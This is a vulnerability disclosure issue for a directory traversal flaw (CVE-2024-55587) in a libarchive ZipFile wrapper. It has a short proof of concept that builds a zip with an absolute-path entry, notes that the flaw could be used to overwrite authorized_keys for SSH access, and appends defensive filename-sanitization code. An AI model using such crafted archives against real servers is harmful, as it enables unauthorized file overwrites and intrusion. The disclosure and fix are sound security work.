Directory Traversal Vulnerability (CVE-2024-55587) #42
CSIRTTrizna opened this issue Dec 11, 2024 · 0 comments
Description

The extract and extractall methods in the ZipFile class are vulnerable to directory traversal attacks, allowing files to be written anywhere on disk, regardless of the target path specified by the developer.
A detailed description of the vulnerability is available on our webpage:

Proof of Concept

If we create a zip archive with the following code:

```python
import pyzipper
import time

# Build an archive whose single entry carries an absolute path as its name.
with pyzipper.ZipFile("exploit.zip", 'w', compression=pyzipper.ZIP_LZMA) as zf:
    zip_info = zf.zipinfo_cls(filename="/tmp/vulnerable.txt", date_time=time.localtime(time.time())[:6])
    zf.writestr(zip_info, "vulnerable")
```

Then we can extract the created archive using the extractall method:

```python
from libarchive.zip import ZipFile

# The entry name is honoured as-is, so the file does not land under "./".
with ZipFile("exploit.zip", mode="r") as archive:
    archive.extractall(path="./")
```

After extracting the archive using the extractall method, the vulnerable.txt file will be created in the /tmp directory with the contents "vulnerable".

Possible Impact

This vulnerability can be exploited, for example, to overwrite the authorized_keys file in a user's home directory, enabling an attacker to connect to the affected server via SSH.

Summary

A fix for this vulnerability is available in pull request #41, containing additional filename sanitization.
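As an added example (not code from this report or from the project), the kind of member-name check the fix refers to, written against Python's standard-library zipfile: it rejects absolute paths and any ".." component before extraction and confirms that the resolved target stays inside the destination. The function names and the sample archive are constructed for this illustration.

```python
import io
import os
import zipfile


def is_safe_member(name: str, dest: str) -> bool:
    """True only if archive member `name` would land inside `dest`.

    Rejects absolute paths, drive letters and any '..' component, then
    confirms containment by resolving the joined path against `dest`.
    """
    normalised = name.replace("\\", "/")  # zip entries may use either separator
    if normalised.startswith("/") or os.path.splitdrive(normalised)[0]:
        return False
    if any(part == ".." for part in normalised.split("/")):
        return False
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, normalised))
    # Trailing separator prevents "/out" from matching "/out2/...".
    return target == dest_real or target.startswith(dest_real + os.sep)


def audit_archive(data: bytes, dest: str) -> dict:
    """Map each member name of an in-memory zip to its verdict (True = safe)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {i.filename: is_safe_member(i.filename, dest) for i in zf.infolist()}


def safe_extractall(data: bytes, dest: str) -> list:
    """Extract only members that pass the check; return the names written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not is_safe_member(info.filename, dest):
                continue  # refuse the entry rather than writing it elsewhere
            zf.extract(info, dest)
            written.append(info.filename)
    return written


def build_sample_archive() -> bytes:
    """Constructed sample: one benign entry plus two traversal-style names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign")
        zf.writestr("/tmp/vulnerable.txt", "absolute path, as in the report")
        zf.writestr("../escape.txt", "parent-directory traversal")
    return buf.getvalue()
```

The containment check resolves symlinks that already exist under the destination, but entries extracted earlier in the same run can still create new links, so a production extractor should also refuse symlink members or re-check each target immediately before writing it.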
